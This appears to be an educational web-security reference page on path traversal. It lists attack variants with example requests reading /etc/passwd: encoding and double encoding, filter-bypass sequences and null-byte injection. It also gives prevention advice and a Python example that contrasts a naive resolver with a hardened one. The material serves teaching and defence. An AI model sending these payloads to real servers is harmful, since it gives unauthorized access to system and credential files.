Path Traversal

Overview

Directory Traversal is a web security vulnerability that allows an attacker to gain unauthorized access to files and directories stored outside the intended web root directory. This is often possible when an application uses user-supplied input to construct file paths.


Common Attack Variants

1. Relative Path Traversal

Using ../ sequences to traverse directories upwards from the web root.

GET /loadImage?filename=../../../etc/passwd

2. Absolute Path Traversal

Providing an absolute path directly to a sensitive file.

GET /loadImage?filename=/etc/passwd

3. Traversal from a Known Start Path

If the application validates the file path to begin with a specific base directory (e.g., /var/www/images), attackers may still traverse out of it:

GET /loadImage?filename=/var/www/images/../../../etc/passwd

4. Traversal with Escaped Paths

Using nested or mixed-separator sequences that survive a filter which strips ../ only once (non-recursively), such as:

GET /loadImage?filename=....//....//....//etc/passwd
GET /loadImage?filename=....\/....\/....\/etc/passwd

5. Traversal Using URL Encoding

To bypass filters that remove ../, encode them:

  • %2e%2e%2f (for ../)

  • %252e%252e%252f (double encoded)

  • Other variants: ..%c0%af, ..%ef%bc%8f

GET /loadImage?filename=..%252f..%252f..%252fetc/passwd

6. Null Byte Injection

If file extensions are validated (e.g., .png required), a null byte %00 may prematurely terminate the string:

GET /loadImage?filename=../../../etc/passwd%00.png

Prevention Techniques

  1. Disallow User-Controlled File Paths

    • Do not use user input directly in file retrieval logic.

  2. Input Sanitization

    • Strip path traversal sequences (../, ..\, etc.) and URL-encoded forms.

  3. Restrict File Access

    • Limit file access to predefined directories using strict whitelists.

  4. Use File Path Whitelisting

    • Only allow access to known-safe files using a safelist.

  5. Run with Least Privilege

    • Ensure the web server runs with permissions that prevent it from reading sensitive OS files.

  6. Canonicalization Before Validation

    • Normalize file paths before validating them to avoid bypasses via encoding or obfuscation.

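As an added example (not from the original page), the following Python contrasts naive path construction with a resolver that applies points 3 and 6 above, canonicalizing before validating and then enforcing a base directory, run over the payloads from the variants listed earlier; the base directory /var/www/images and the file name cat.png are assumed.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed document root for this example; the page itself fixes no base directory.
BASE_DIR = "/var/www/images"

# Payloads from the variants above, plus one constructed legitimate request.
PAYLOADS = [
    "cat.png",                              # legitimate (constructed)
    "../../../etc/passwd",                  # 1. relative traversal
    "/etc/passwd",                          # 2. absolute path
    "/var/www/images/../../../etc/passwd",  # 3. known start path
    "....//....//....//etc/passwd",         # 4. escaped path
    "..%252f..%252f..%252fetc/passwd",      # 5. double URL encoding
    "../../../etc/passwd%00.png",           # 6. null byte
]

def escapes_root(path: str) -> bool:
    """True when a canonical path lies outside BASE_DIR."""
    return path != BASE_DIR and not path.startswith(BASE_DIR + "/")

def vulnerable_resolve(filename: str) -> str:
    """Naive construction: decode the parameter once and glue it onto the root."""
    return posixpath.normpath(posixpath.join(BASE_DIR, unquote(filename)))

def safe_resolve(filename: str) -> Optional[str]:
    """Canonicalize first, then validate; return the path only if it stays under BASE_DIR."""
    decoded = filename
    for _ in range(3):  # decode until stable, so %252e%252e%252f also ends up as ../
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    else:
        return None  # still changing after three rounds: treat as hostile
    if "\x00" in decoded or "\\" in decoded:
        return None  # NUL terminator trick and backslash separators
    # join() lets an absolute input replace BASE_DIR; normpath folds ../ and the
    # containment check below then rejects anything that ended up outside the root.
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, decoded))
    return None if escapes_root(candidate) else candidate

def run_demo() -> dict:
    """Map each payload to (did the naive resolver escape the root?, hardened result)."""
    return {p: (escapes_root(vulnerable_resolve(p)), safe_resolve(p)) for p in PAYLOADS}

if __name__ == "__main__":
    for payload, (leaked, hardened) in run_demo().items():
        print(f"{payload!r:42} naive escapes: {str(leaked):5} hardened: {hardened}")
```

Against a real filesystem, resolve the candidate with os.path.realpath as well so symlinks inside the base directory cannot point back out of it.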

Summary Examples

Technique                                  Example URL
Relative traversal                         ?filename=../../../etc/passwd
Absolute path                              ?filename=/etc/passwd
Null byte injection                        ?filename=../../../etc/passwd%00.png
Encoded traversal                          ?filename=%2E%2E%2Fetc%2Fpasswd
Known base path with relative traversal    ?filename=/var/www/images/../../../etc/passwd
Escaped traversal                          ?filename=....//....//etc/passwd

Last updated 19 days ago